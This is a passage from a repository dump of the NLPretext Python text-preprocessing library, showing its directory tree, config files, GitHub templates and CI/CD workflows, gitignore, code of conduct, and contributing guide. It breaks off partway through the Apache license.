Repository: artefactory/NLPretext
Branch: main
Commit: 0d2cc4fe9e5d
Files: 72
Total size: 410.9 KB
Directory structure:
gitextract_i1k0jy7m/
├── .dockerignore
├── .editorconfig
├── .github/
│ ├── .stale.yml
│ ├── CODEOWNERS
│ ├── ISSUE_TEMPLATE/
│ │ ├── bug_report.md
│ │ ├── config.yml
│ │ ├── feature_request.md
│ │ └── question.md
│ ├── PULL_REQUEST_TEMPLATE.md
│ ├── dependabot.yml
│ ├── release-drafter.yml
│ └── workflows/
│ ├── cd.yml
│ ├── ci.yml
│ ├── greetings.yml
│ └── release-drafter.yml
├── .gitignore
├── .pre-commit-config.yaml
├── CODE_OF_CONDUCT.md
├── CONTRIBUTING.md
├── LICENSE
├── Makefile
├── README.md
├── SECURITY.md
├── datasets/
│ └── external/
│ ├── get_language_dataset.sh
│ └── get_stanfordtweets.sh
├── docker/
│ ├── Dockerfile
│ └── README.md
├── docs/
│ ├── Makefile
│ ├── make.bat
│ ├── scripts/
│ │ └── buildsite.sh
│ └── source/
│ ├── _templates/
│ │ ├── module.rst_t
│ │ ├── package.rst_t
│ │ └── versions.html
│ ├── conf.py
│ ├── index.rst
│ └── tutorials/
│ ├── basic_notebook.ipynb
│ └── index.rst
├── nlpretext/
│ ├── __init__.py
│ ├── _config/
│ │ ├── __init__.py
│ │ ├── config.py
│ │ ├── constants.py
│ │ └── stopwords.py
│ ├── _utils/
│ │ ├── __init__.py
│ │ ├── daskloader.py
│ │ ├── file_loader.py
│ │ ├── pandasloader.py
│ │ ├── phone_number.py
│ │ └── stopwords.py
│ ├── augmentation/
│ │ ├── __init__.py
│ │ └── text_augmentation.py
│ ├── basic/
│ │ ├── __init__.py
│ │ └── preprocess.py
│ ├── cli/
│ │ ├── __init__.py
│ │ ├── __main__.py
│ │ └── preprocess.py
│ ├── preprocessor.py
│ ├── py.typed
│ ├── social/
│ │ ├── __init__.py
│ │ └── preprocess.py
│ ├── textloader.py
│ └── token/
│ ├── __init__.py
│ ├── preprocess.py
│ └── tokenizer.py
├── pyproject.toml
├── references/
│ └── .gitkeep
└── tests/
├── __init__.py
├── test_data_augmentation.py
├── test_file_loader.py
├── test_phone_number.py
├── test_preprocessor.py
├── test_textloader.py
└── test_tokenizer.py
================================================
FILE CONTENTS
================================================
================================================
FILE: .dockerignore
================================================
# Git
.git
.gitignore
.github
# Docker
.dockerignore
docker/
# IDE
.idea
.vscode
# Byte-compiled / optimized / DLL files
__pycache__/
**/__pycache__/
*.pyc
*.pyo
*.pyd
.Python
*.py[cod]
*$py.class
.pytest_cache/
..mypy_cache/
# poetry
.venv
# C extensions
*.so
# Virtual environment
.venv
venv
.DS_Store
.AppleDouble
.LSOverride
._*
================================================
FILE: .editorconfig
================================================
# Check http://editorconfig.org for more information
# This is the main config file for this project:
root = true
[*]
charset = utf-8
end_of_line = lf
insert_final_newline = true
indent_style = space
indent_size = 2
trim_trailing_whitespace = true
[*.{py, pyi}]
indent_style = space
indent_size = 4
[Makefile]
indent_style = tab
[*.md]
trim_trailing_whitespace = false
[*.{diff,patch}]
trim_trailing_whitespace = false
================================================
FILE: .github/.stale.yml
================================================
# Number of days of inactivity before an issue becomes stale
daysUntilStale: 60
# Number of days of inactivity before a stale issue is closed
daysUntilClose: 7
# Issues with these labels will never be considered stale
exemptLabels:
- pinned
- security
# Label to use when marking an issue as stale
staleLabel: wontfix
# Comment to post when marking an issue as stale. Set to `false` to disable
markComment: >
This issue has been automatically marked as stale because it has not had
recent activity. It will be closed if no further activity occurs. Thank you
for your contributions.
# Comment to post when closing a stale issue. Set to `false` to disable
closeComment: false
================================================
FILE: .github/CODEOWNERS
================================================
# https://help.github.com/en/articles/about-code-owners
* @julesbertrand @amaleelhamri @hugovasselin @Guillaume6606
================================================
FILE: .github/ISSUE_TEMPLATE/bug_report.md
================================================
---
name: 🐛 Bug report
about: If something isn't working 🔧
title: ''
labels: bug
assignees:
---
## 🐛 Bug Report
## 🔬 How To Reproduce
Steps to reproduce the behavior:
1. ...
### Code sample
### Environment
* OS: [e.g. Linux / Windows / macOS]
* Python version, get it with:
```bash
python --version
```
### Screenshots
## 📈 Expected behavior
## 📎 Additional context
================================================
FILE: .github/ISSUE_TEMPLATE/config.yml
================================================
# Configuration: https://help.github.com/en/github/building-a-strong-community/configuring-issue-templates-for-your-repository
blank_issues_enabled: false
================================================
FILE: .github/ISSUE_TEMPLATE/feature_request.md
================================================
---
name: 🚀 Feature request
about: Suggest an idea for this project 🏖
title: ''
labels: enhancement
assignees:
---
## 🚀 Feature Request
## 🔈 Motivation
## 🛰 Alternatives
## 📎 Additional context
================================================
FILE: .github/ISSUE_TEMPLATE/question.md
================================================
---
name: ❓ Question
about: Ask a question about this project 🎓
title: ''
labels: question
assignees:
---
## Checklist
- [ ] I've searched the project's [`issues`](https://github.com/artefactory/NLPretext}/issues?q=is%3Aissue).
## ❓ Question
How can I [...]?
Is it possible to [...]?
## 📎 Additional context
================================================
FILE: .github/PULL_REQUEST_TEMPLATE.md
================================================
## Description
## Related Issue
## Type of Change
- [ ] 📚 Examples / docs / tutorials / dependencies update
- [ ] 🔧 Bug fix (non-breaking change which fixes an issue)
- [ ] 🥂 Improvement (non-breaking change which improves an existing feature)
- [ ] 🚀 New feature (non-breaking change which adds functionality)
- [ ] 💥 Breaking change (fix or feature that would cause existing functionality to change)
- [ ] 🔐 Security fix
## Checklist
- [ ] I've read the [`CODE_OF_CONDUCT.md`](https://github.com/artefactory/NLPretext}/blob/main/CODE_OF_CONDUCT.md) document.
- [ ] I've read the [`CONTRIBUTING.md`](https://github.com/artefactory/NLPretext}/blob/main/CONTRIBUTING.md) guide.
- [ ] I've updated the code style using `make format-code`.
- [ ] I've written tests for all new methods and classes that I created.
- [ ] I've written the docstring in Google format for all the methods and classes that I used.
================================================
FILE: .github/dependabot.yml
================================================
# Configuration: https://dependabot.com/docs/config-file/
# Docs: https://docs.github.com/en/github/administering-a-repository/keeping-your-dependencies-updated-automatically
version: 2
updates:
- package-ecosystem: "pip"
directory: "/"
schedule:
interval: "weekly"
day: "monday"
time: "09:00"
allow:
- dependency-type: "all"
ignore:
- dependency-name: "*"
update-types: ["version-update:semver-patch"]
labels:
- draft
- dependencies
- python
- package-ecosystem: "github-actions"
directory: "/"
schedule:
interval: "weekly"
day: "monday"
time: "09:00"
allow:
- dependency-type: "all"
labels:
- draft
- dependencies
- github_actions
- package-ecosystem: "docker"
directory: "/docker/"
schedule:
interval: "weekly"
day: "monday"
time: "09:00"
allow:
- dependency-type: "all"
labels:
- draft
- dependencies
- docker
================================================
FILE: .github/release-drafter.yml
================================================
# Release drafter configuration https://github.com/release-drafter/release-drafter#configuration
# Emojis were chosen to match the https://gitmoji.carloscuesta.me/
name-template: "$NEXT_PATCH_VERSION"
tag-template: "$NEXT_PATCH_VERSION"
categories:
- title: ":rocket: Features"
labels: [enhancement, feature]
- title: ":wrench: Fixes & Refactoring"
labels: [bug, refactoring, bugfix, fix]
- title: ":package: Build System & CI/CD"
labels: [build, ci, testing]
- title: ":boom: Breaking Changes"
labels: [breaking]
- title: ":pencil: Documentation"
labels: [documentation]
- title: ":arrow_up: Dependencies updates"
labels: [dependencies]
template: |
## What’s Changed
$CHANGES
## :busts_in_silhouette: List of contributors
$CONTRIBUTORS
================================================
FILE: .github/workflows/cd.yml
================================================
name: Continuous Deployment
on:
release:
types: [published]
jobs:
docker:
runs-on: ubuntu-latest
steps:
- name: Checkout
uses: actions/checkout@v4
- name: Set up Docker Buildx
uses: docker/setup-buildx-action@v3
- name: Login to Github Container Registry
uses: docker/login-action@v3
with:
username: ${{ github.actor }}
password: ${{ secrets.GITHUB_TOKEN }}
registry: ghcr.io
- name: Set tag name
id: tag
run: echo "tag_name=${GITHUB_REF//\//-}" >> $GITHUB_OUTPUT
env:
GITHUB_REF: ${{ github.ref }}
- name: Build and push
uses: docker/build-push-action@v4
with:
context: .
file: ./docker/Dockerfile
push: true
tags: |
ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}
ghcr.io/artefactory/nlpretext:latest
cache-from: type=registry,ref=ghcr.io/artefactory/nlpretext:latest
cache-to: type=inline
- name: Scan image
uses: anchore/scan-action@v3
id: scan
with:
image: "ghcr.io/artefactory/nlpretext:${{ steps.tag.outputs.tag_name }}"
output-format: table
- name: upload Anchore scan SARIF report
if: success() || failure()
uses: github/codeql-action/upload-sarif@v1
with:
sarif_file: ${{ steps.scan.outputs.sarif }}
documentation_and_package:
runs-on: ubuntu-latest
strategy:
matrix:
python-version: ["3.8"]
steps:
- name: Checkout
uses: actions/checkout@v4
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
- name: Install poetry and pandoc
run: |
sudo apt-get install pandoc
make download-poetry
- name: Set up cache
uses: actions/cache@v3.3.2
with:
path: ~/.cache/pypoetry/virtualenvs
key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }}
- name: Set Poetry Path
run: |
echo "$HOME/.poetry/bin" >> $GITHUB_PATH
- name: Install dependencies
run: |
poetry install -E torch -E dask
- name: Publish to PyPI
env:
PYPI_TOKEN: ${{ secrets.PYPI_TOKEN }}
run: |
poetry config pypi-token.pypi $PYPI_TOKEN
poetry publish --build
- name: Run build script for Sphinx pages
run: |
poetry run git config --global user.name "Github-Pages Bot"
poetry run git config --global user.email "github-pages@artefactory.com"
poetry run sh docs/scripts/buildsite.sh
shell: bash
================================================
FILE: .github/workflows/ci.yml
================================================
# GNU Lesser General Public License v3.0 only
# Copyright (C) 2020 Artefact
# licence-information@artefact.com
#
# This program is free software; you can redistribute it and/or
# modify it under the terms of the GNU Lesser General Public
# License as published by the Free Software Foundation; either
# version 3 of the License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
# Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public License
# along with this program; if not, write to the Free Software Foundation,
# Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
name: Continuous Integration
on:
push:
branches:
- main
pull_request:
branches:
- '*'
jobs:
ci:
runs-on: ubuntu-latest
strategy:
matrix:
python-version: ["3.8", "3.9", "3.10"]
if: ${{ !contains(github.event.pull_request.labels.*.name, 'draft') }}
steps:
- uses: actions/checkout@v2
- name: Set up Python ${{ matrix.python-version }}
uses: actions/setup-python@v4
with:
python-version: ${{ matrix.python-version }}
cache: 'pip'
- name: Install poetry
run: make download-poetry
- name: Set up pip cache
uses: actions/cache@v3.3.2
with:
path: ~/.cache/pypoetry/virtualenvs
key: venv-${{ matrix.python-version }}-${{ hashFiles('pyproject.toml') }}-${{ hashFiles('poetry.lock') }}
- name: Set up mypy cache
uses: actions/cache@v3.2.4
with:
path: ${{ github.workspace }}/.mypy_cache
key: mypy-${{ matrix.python-version }}
- name: Set Poetry Path
run: |
echo "$HOME/.poetry/bin" >> $GITHUB_PATH
- name: Install dependencies
run: |
poetry run pip install --upgrade pip
poetry install -E torch -E dask
- name: Run safety checks
run: |
STRICT=1 make check-safety
- name: Lint and format
run: |
make format-code
- name: Run tests
run: |
make test
================================================
FILE: .github/workflows/greetings.yml
================================================
name: Greetings
on:
pull_request:
types:
- opened
- reopened
- edited
- labeled
- unlabeled
- synchronize
issues:
jobs:
greeting:
runs-on: ubuntu-latest
if: ${{ !contains(github.head_ref, 'dependabot/') }}
steps:
- uses: actions/first-interaction@v1
with:
repo-token: ${{ secrets.GITHUB_TOKEN }}
pr-message: 'Hello @${{ github.actor }}, thank you for submitting a PR! We will respond as soon as possible.'
issue-message: |
Hello @${{ github.actor }}, thank you for your interest in our work!
If this is a bug report, please provide screenshots and **minimum viable code to reproduce your issue**, otherwise we can not help you.
================================================
FILE: .github/workflows/release-drafter.yml
================================================
name: Release Drafter
on:
push:
# branches to consider in the event; optional, defaults to all
branches:
- main
jobs:
update_release_draft:
runs-on: ubuntu-latest
steps:
# Drafts your next Release notes as Pull Requests are merged into "main"
- uses: release-drafter/release-drafter@v5.22.0
env:
GITHUB_TOKEN: ${{ secrets.GITHUB_TOKEN }}
================================================
FILE: .gitignore
================================================
# Created by https://www.gitignore.io/api/osx,python,pycharm,windows,visualstudio,visualstudiocode
# Edit at https://www.gitignore.io/?templates=osx,python,pycharm,windows,visualstudio,visualstudiocode
### OSX ###
# General
.DS_Store
.AppleDouble
.LSOverride
# Icon must end with two \r
Icon
# Thumbnails
._*
# Files that might appear in the root of a volume
.DocumentRevisions-V100
.fseventsd
.Spotlight-V100
.TemporaryItems
.Trashes
.VolumeIcon.icns
.com.apple.timemachine.donotpresent
# Directories potentially created on remote AFP share
.AppleDB
.AppleDesktop
Network Trash Folder
Temporary Items
.apdisk
### PyCharm ###
# Covers JetBrains IDEs: IntelliJ, RubyMine, PhpStorm, AppCode, PyCharm, CLion, Android Studio and WebStorm
# Reference: https://intellij-support.jetbrains.com/hc/en-us/articles/206544839
# User-specific stuff
.idea/
.idea/**/workspace.xml
.idea/**/tasks.xml
.idea/**/usage.statistics.xml
.idea/**/dictionaries
.idea/**/shelf
# Generated files
.idea/**/contentModel.xml
# Sensitive or high-churn files
.idea/**/dataSources/
.idea/**/dataSources.ids
.idea/**/dataSources.local.xml
.idea/**/sqlDataSources.xml
.idea/**/dynamic.xml
.idea/**/uiDesigner.xml
.idea/**/dbnavigator.xml
# Gradle
.idea/**/gradle.xml
.idea/**/libraries
# Gradle and Maven with auto-import
# When using Gradle or Maven with auto-import, you should exclude module files,
# since they will be recreated, and may cause churn. Uncomment if using
# auto-import.
# .idea/modules.xml
# .idea/*.iml
# .idea/modules
# *.iml
# *.ipr
# CMake
cmake-build-*/
# Mongo Explorer plugin
.idea/**/mongoSettings.xml
# File-based project format
*.iws
# IntelliJ
out/
# mpeltonen/sbt-idea plugin
.idea_modules/
# JIRA plugin
atlassian-ide-plugin.xml
# Cursive Clojure plugin
.idea/replstate.xml
# Crashlytics plugin (for Android Studio and IntelliJ)
com_crashlytics_export_strings.xml
crashlytics.properties
crashlytics-build.properties
fabric.properties
# Editor-based Rest Client
.idea/httpRequests
# Android studio 3.1+ serialized cache file
.idea/caches/build_file_checksums.ser
### PyCharm Patch ###
# Comment Reason: https://github.com/joeblau/gitignore.io/issues/186#issuecomment-215987721
# *.iml
# modules.xml
# .idea/misc.xml
# *.ipr
# Sonarlint plugin
.idea/**/sonarlint/
# SonarQube Plugin
.idea/**/sonarIssues.xml
# Markdown Navigator plugin
.idea/**/markdown-navigator.xml
.idea/**/markdown-navigator/
### Python ###
# Byte-compiled / optimized / DLL files
__pycache__/
*.py[cod]
*$py.class
# C extensions
*.so
# Distribution / packaging
.Python
env/
build/
develop-eggs/
dist/
downloads/
eggs/
.eggs/
lib/
lib64/
parts/
sdist/
var/
wheels/
pip-wheel-metadata/
share/python-wheels/
*.egg-info/
.installed.cfg
*.egg
MANIFEST
# PyInstaller
# Usually these files are written by a python script from a template
# before PyInstaller builds the exe, so as to inject date/other infos into it.
*.manifest
*.spec
# Installer logs
pip-log.txt
pip-delete-this-directory.txt
# Unit test / coverage reports
htmlcov/
.tox/
.nox/
.coverage
.coverage.*
.cache
nosetests.xml
coverage.xml
*.cover
.hypothesis/
.pytest_cache/
.ruff_cache/
# Translations
*.mo
*.pot
# Scrapy stuff:
.scrapy
# Django stuff:
*.log
# Sphinx documentation
docs/_build/
# PyBuilder
target/
# pyenv
.python-version
# poetry
.venv
# pipenv
# According to pypa/pipenv#598, it is recommended to include Pipfile.lock in version control.
# However, in case of collaboration, if having platform-specific dependencies or dependencies
# having no cross-platform support, pipenv may install dependencies that don't work, or not
# install all needed dependencies.
#Pipfile.lock
# celery beat schedule file
celerybeat-schedule
# SageMath parsed files
*.sage.py
# Spyder project settings
.spyderproject
.spyproject
# Rope project settings
.ropeproject
# Mr Developer
.mr.developer.cfg
.project
.pydevproject
# mkdocs documentation
/site
# mypy
.mypy_cache/
.dmypy.json
dmypy.json
# Pyre type checker
.pyre/
# Plugins
.secrets.baseline
### VisualStudioCode ###
.vscode/*
!.vscode/tasks.json
!.vscode/launch.json
!.vscode/extensions.json
### VisualStudioCode Patch ###
# Ignore all local history of files
.history
### Windows ###
# Windows thumbnail cache files
Thumbs.db
Thumbs.db:encryptable
ehthumbs.db
ehthumbs_vista.db
# Dump file
*.stackdump
# Folder config file
[Dd]esktop.ini
# Recycle Bin used on file shares
$RECYCLE.BIN/
# Windows Installer files
*.cab
*.msi
*.msix
*.msm
*.msp
# Windows shortcuts
*.lnk
### VisualStudio ###
## Ignore Visual Studio temporary files, build results, and
## files generated by popular Visual Studio add-ons.
##
## Get latest from https://github.com/github/gitignore/blob/master/VisualStudio.gitignore
# User-specific files
*.rsuser
*.suo
*.user
*.userosscache
*.sln.docstates
# User-specific files (MonoDevelop/Xamarin Studio)
*.userprefs
# Mono auto generated files
mono_crash.*
# Build results
[Dd]ebug/
[Dd]ebugPublic/
[Rr]elease/
[Rr]eleases/
x64/
x86/
[Aa][Rr][Mm]/
[Aa][Rr][Mm]64/
bld/
[Bb]in/
[Oo]bj/
[Ll]og/
# Visual Studio 2015/2017 cache/options directory
.vs/
# Uncomment if you have tasks that create the project's static files in wwwroot
#wwwroot/
# Visual Studio 2017 auto generated files
Generated\ Files/
# MSTest test Results
[Tt]est[Rr]esult*/
[Bb]uild[Ll]og.*
# NUnit
*.VisualState.xml
TestResult.xml
nunit-*.xml
# Build Results of an ATL Project
[Dd]ebugPS/
[Rr]eleasePS/
dlldata.c
# Benchmark Results
BenchmarkDotNet.Artifacts/
# .NET Core
project.lock.json
project.fragment.lock.json
artifacts/
# StyleCop
StyleCopReport.xml
# Files built by Visual Studio
*_i.c
*_p.c
*_h.h
*.ilk
*.obj
*.iobj
*.pch
*.pdb
*.ipdb
*.pgc
*.pgd
*.rsp
*.sbr
*.tlb
*.tli
*.tlh
*.tmp
*.tmp_proj
*_wpftmp.csproj
*.vspscc
*.vssscc
.builds
*.pidb
*.svclog
*.scc
# Chutzpah Test files
_Chutzpah*
# Visual C++ cache files
ipch/
*.aps
*.ncb
*.opendb
*.opensdf
*.sdf
*.cachefile
*.VC.db
*.VC.VC.opendb
# Visual Studio profiler
*.psess
*.vsp
*.vspx
*.sap
# Visual Studio Trace Files
*.e2e
# TFS 2012 Local Workspace
$tf/
# Guidance Automation Toolkit
*.gpState
# ReSharper is a .NET coding add-in
_ReSharper*/
*.[Rr]e[Ss]harper
*.DotSettings.user
# JustCode is a .NET coding add-in
.JustCode
# TeamCity is a build add-in
_TeamCity*
# DotCover is a Code Coverage Tool
*.dotCover
# AxoCover is a Code Coverage Tool
.axoCover/*
!.axoCover/settings.json
# Visual Studio code coverage results
*.coverage
*.coveragexml
# NCrunch
_NCrunch_*
.*crunch*.local.xml
nCrunchTemp_*
# MightyMoose
*.mm.*
AutoTest.Net/
# Web workbench (sass)
.sass-cache/
# Installshield output folder
[Ee]xpress/
# DocProject is a documentation generator add-in
DocProject/buildhelp/
DocProject/Help/*.HxT
DocProject/Help/*.HxC
DocProject/Help/*.hhc
DocProject/Help/*.hhk
DocProject/Help/*.hhp
DocProject/Help/Html2
DocProject/Help/html
# Click-Once directory
publish/
# Publish Web Output
*.[Pp]ublish.xml
*.azurePubxml
# Note: Comment the next line if you want to checkin your web deploy settings,
# but database connection strings (with potential passwords) will be unencrypted
*.pubxml
*.publishproj
# Microsoft Azure Web App publish settings. Comment the next line if you want to
# checkin your Azure Web App publish settings, but sensitive information contained
# in these scripts will be unencrypted
PublishScripts/
# NuGet Packages
*.nupkg
# NuGet Symbol Packages
*.snupkg
# The packages folder can be ignored because of Package Restore
**/[Pp]ackages/*
# except build/, which is used as an MSBuild target.
!**/[Pp]ackages/build/
# Uncomment if necessary however generally it will be regenerated when needed
#!**/[Pp]ackages/repositories.config
# NuGet v3's project.json files produces more ignorable files
*.nuget.props
*.nuget.targets
# Microsoft Azure Build Output
csx/
*.build.csdef
# Microsoft Azure Emulator
ecf/
rcf/
# Windows Store app package directories and files
AppPackages/
BundleArtifacts/
Package.StoreAssociation.xml
_pkginfo.txt
*.appx
*.appxbundle
*.appxupload
# Visual Studio cache files
# files ending in .cache can be ignored
*.[Cc]ache
# but keep track of directories ending in .cache
!?*.[Cc]ache/
# Others
ClientBin/
~$*
*~
*.dbmdl
*.dbproj.schemaview
*.jfm
*.pfx
*.publishsettings
orleans.codegen.cs
# Including strong name files can present a security risk
# (https://github.com/github/gitignore/pull/2483#issue-259490424)
#*.snk
# Since there are multiple workflows, uncomment next line to ignore bower_components
# (https://github.com/github/gitignore/pull/1529#issuecomment-104372622)
#bower_components/
# RIA/Silverlight projects
Generated_Code/
# Backup & report files from converting an old project file
# to a newer Visual Studio version. Backup files are not needed,
# because we have git ;-)
_UpgradeReport_Files/
Backup*/
UpgradeLog*.XML
UpgradeLog*.htm
ServiceFabricBackup/
*.rptproj.bak
# SQL Server files
*.mdf
*.ldf
*.ndf
# Business Intelligence projects
*.rdl.data
*.bim.layout
*.bim_*.settings
*.rptproj.rsuser
*- [Bb]ackup.rdl
*- [Bb]ackup ([0-9]).rdl
*- [Bb]ackup ([0-9][0-9]).rdl
# Microsoft Fakes
FakesAssemblies/
# GhostDoc plugin setting file
*.GhostDoc.xml
# Node.js Tools for Visual Studio
.ntvs_analysis.dat
node_modules/
# Visual Studio 6 build log
*.plg
# Visual Studio 6 workspace options file
*.opt
# Visual Studio 6 auto-generated workspace file (contains which files were open etc.)
*.vbw
# Visual Studio LightSwitch build output
**/*.HTMLClient/GeneratedArtifacts
**/*.DesktopClient/GeneratedArtifacts
**/*.DesktopClient/ModelManifest.xml
**/*.Server/GeneratedArtifacts
**/*.Server/ModelManifest.xml
_Pvt_Extensions
# Paket dependency manager
.paket/paket.exe
paket-files/
# FAKE - F# Make
.fake/
# CodeRush personal settings
.cr/personal
# Python Tools for Visual Studio (PTVS)
*.pyc
# Cake - Uncomment if you are using it
# tools/**
# !tools/packages.config
# Tabs Studio
*.tss
# Telerik's JustMock configuration file
*.jmconfig
# BizTalk build output
*.btp.cs
*.btm.cs
*.odx.cs
*.xsd.cs
# OpenCover UI analysis results
OpenCover/
# Azure Stream Analytics local run output
ASALocalRun/
# MSBuild Binary and Structured Log
*.binlog
# NVidia Nsight GPU debugger configuration file
*.nvuser
# MFractors (Xamarin productivity tool) working folder
.mfractor/
# Local History for Visual Studio
.localhistory/
# BeatPulse healthcheck temp database
healthchecksdb
# Backup folder for Package Reference Convert tool in Visual Studio 2017
MigrationBackup/
# DotEnv configuration
.env
# Database
*.db
*.rdb
# Pycharm
.idea
venv/
# VS Code
.vscode/
# Spyder
.spyproject/
# Jupyter NB Checkpoints
.ipynb_checkpoints/
# exclude data from source control by default
# vim
*.swp
*.swo
data/
================================================
FILE: .pre-commit-config.yaml
================================================
default_language_version:
python: python3.10
repos:
- repo: https://github.com/pre-commit/pre-commit-hooks
rev: v4.5.0
hooks:
- id: trailing-whitespace
- id: end-of-file-fixer
- id: check-yaml
- id: check-toml
- id: check-json
- id: check-added-large-files
- repo: local
hooks:
- id: isort
name: isort
entry: poetry run isort --settings-path pyproject.toml
types: [python]
language: system
stages: [commit, push]
- id: pyupgrade
name: pyupgrade
entry: poetry run pyupgrade --py38-plus
types: [python]
language: system
stages: [commit, push]
- id: black
name: black
entry: poetry run black --config pyproject.toml
types: [python]
language: system
stages: [commit, push]
- id: ruff
name: ruf
entry: poetry run ruff check --config pyproject.toml
types: [python]
language: system
stages: [commit, push]
- id: mypy
name: mypy
entry: poetry run mypy
require_serial: true
types: [python]
language: system
stages: [push]
- id: gitleaks
name: gitleaks
entry: make gitleaks
require_serial: true
types: [file]
language: system
pass_filenames: false
stages: [push]
================================================
FILE: CODE_OF_CONDUCT.md
================================================
# Contributor Covenant Code of Conduct
## Our Pledge
In the interest of fostering an open and welcoming environment, we as
contributors and maintainers pledge to making participation in our project and
our community a harassment-free experience for everyone, regardless of age, body
size, disability, ethnicity, sex characteristics, gender identity and expression,
level of experience, education, socio-economic status, nationality, personal
appearance, race, religion, or sexual identity and orientation.
## Our Standards
Examples of behavior that contributes to creating a positive environment
include:
* Using welcoming and inclusive language
* Being respectful of differing viewpoints and experiences
* Gracefully accepting constructive criticism
* Focusing on what is best for the community
* Showing empathy towards other community members
Examples of unacceptable behavior by participants include:
* The use of sexualized language or imagery and unwelcome sexual attention or
advances
* Trolling, insulting/derogatory comments, and personal or political attacks
* Public or private harassment
* Publishing others' private information, such as a physical or electronic
address, without explicit permission
* Other conduct which could reasonably be considered inappropriate in a
professional setting
## Our Responsibilities
Project maintainers are responsible for clarifying the standards of acceptable
behavior and are expected to take appropriate and fair corrective action in
response to any instances of unacceptable behavior.
Project maintainers have the right and responsibility to remove, edit, or
reject comments, commits, code, wiki edits, issues, and other contributions
that are not aligned to this Code of Conduct, or to ban temporarily or
permanently any contributor for other behaviors that they deem inappropriate,
threatening, offensive, or harmful.
## Scope
This Code of Conduct applies both within project spaces and in public spaces
when an individual is representing the project or its community. Examples of
representing a project or community include using an official project e-mail
address, posting via an official social media account, or acting as an appointed
representative at an online or offline event. Representation of a project may be
further defined and clarified by project maintainers.
## Enforcement
Instances of abusive, harassing, or otherwise unacceptable behavior may be
reported by contacting the project team at rafaelle.aygalenq@artefact.com. All
complaints will be reviewed and investigated and will result in a response that
is deemed necessary and appropriate to the circumstances. The project team is
obligated to maintain confidentiality with regard to the reporter of an incident.
Further details of specific enforcement policies may be posted separately.
Project maintainers who do not follow or enforce the Code of Conduct in good
faith may face temporary or permanent repercussions as determined by other
members of the project's leadership.
## Attribution
This Code of Conduct is adapted from the [Contributor Covenant][homepage], version 1.4,
available at https://www.contributor-covenant.org/version/1/4/code-of-conduct.html
[homepage]: https://www.contributor-covenant.org
For answers to common questions about this code of conduct, see
https://www.contributor-covenant.org/faq
================================================
FILE: CONTRIBUTING.md
================================================
NLPretext
==============================
# How to contribute
## Dependencies
We use `poetry` to manage the [dependencies](https://github.com/python-poetry/poetry).
If you dont have `poetry` installed, you should run the command below.
```bash
make download-poetry; export PATH="$HOME/.local/bin:$PATH"
```
To install dependencies and prepare [`pre-commit`](https://pre-commit.com/) hooks you would need to run `install` command:
```bash
make install
```
To activate your `virtualenv` run `poetry shell`.
## Codestyle
After you run `make install` you can execute the automatic code formatting.
```bash
make format-code
```
### Checks
Many checks are configured for this project. Command `make check-style` will run black diffs, darglint docstring style and mypy.
The `make check-safety` command will look at the security of your code.
You can also use `STRICT=1` flag to make the check be strict.
### Before submitting
Before submitting your code please do the following steps:
1. Add any changes you want
1. Add tests for the new changes
1. Edit documentation if you have changed something significant
1. Run `make format-code` to format your changes.
1. Run `STRICT=1 make check-style` to ensure that types and docs are correct
1. Run `STRICT=1 make check-safety` to ensure that security of your code is correct
## Other help
You can contribute by spreading a word about this library.
It would also be a huge contribution to write
a short article on how you are using this project.
You can also share your best practices with us.
# Docstring format
We chose to use **Numpydoc** over the several [standards](https://stackoverflow.com/questions/3898572/what-is-the-standard-python-docstring-format)
```
"""
My numpydoc description of a kind
of very exhautive numpydoc format docstring.
Parameters
----------
first : array_like
the 1st param name `first`
second :
the 2nd param
third : {'value', 'other'}, optional
the 3rd param, by default 'value'
Returns
-------
string
a value in a string
Raises
------
KeyError
when a key error
OtherError
when an other error
"""
```
================================================
FILE: LICENSE
================================================
Apache License
Version 2.0, January 2004
http://www.apache.org/licenses/
TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
1. Definitions.
"License" shall mean the terms and conditions for use, reproduction,
and distribution as defined by Sections 1 through 9 of this document.
"Licensor" shall mean the copyright owner or entity authorized by
the copyright owner that is granting the License.
"Legal Entity" shall mean the union of the acting entity and all
other entities that control, are controlled by, or are under common
control with that entity. For the purposes of this definition,
"control" means (i) the power, direct or indirect, to cause the
direction or management of such entity, whether by contract or
otherwise, or (ii) ownership of fifty percent (50%) or more of the
outstanding shares, or (iii) beneficial ownership of such entity.
"You" (or "Your") shall mean an individual or Legal Entity
exercising permissions granted by this License.
"Source" form shall mean the preferred form for making modifications,
including but not limited to software source code, documentation
source, and configuration files.
"Object" form shall mean any form resulting from mechanical
transformation or translation of a Source form, including but
not limited to compiled object code, generated documentation,
and conversions to other media types.
"Work" shall mean the work of authorship, whether in Source or
Object form, made available under the License, as indicated by a
copyright notice that is included in or attached to the work
(an example is provided in the Appendix below).
"Derivative Works" shall mean any work, whether in Source or Object
form, that is based on (or derived from) the Work and for which the
editorial revisions, annotations, elaborations, or other modifications
represent, as a whole, an original work of authorship. For the purposes
of this License, Derivative Works shall not include works that remain
separable from, or merely link (or bind by name) to the interfaces of,
the Work and Derivative Works thereof.
"Contribution" shall mean any work of authorship, including
the original version of the Work and any modifications or additions
to that Work or Derivative Works thereof, that is intentionally
submitted to Licensor for inclusion in the Work by the copyright owner
or by an individual or Legal Entity authorized to submit on behalf of
the copyright owner. For the purposes of this definition, "submitted"
means any form of electronic, verbal, or written communication sent
to the Licensor or its representatives, including but not limited to
communication on electronic mailing lists, source code control systems,
and issue tracking systems that are managed by, or on behalf of, the
Licensor for the purpose of discussing and improving the Work, but
excluding communication that is conspicuously marked or otherwise
designated in writing by the copyright owner as "Not a Contribution."
"Contributor" shall mean Licensor and any individual or Legal Entity
on behalf of whom a Contribution has been received by Licensor and
subsequently incorporated within the Work.
2. Grant of Copyright License. Subject to the terms and conditions of
this License, each Contributor hereby grants to You a perpetual,
worldwide, non-exclusive, no-charge, royalty-free, irrevocable
copyright license to reproduce, prepare Derivative Works of,
publicly display, publicly perform, sublicense, and distribute the
Work and such Derivative Works in Source or Object form.
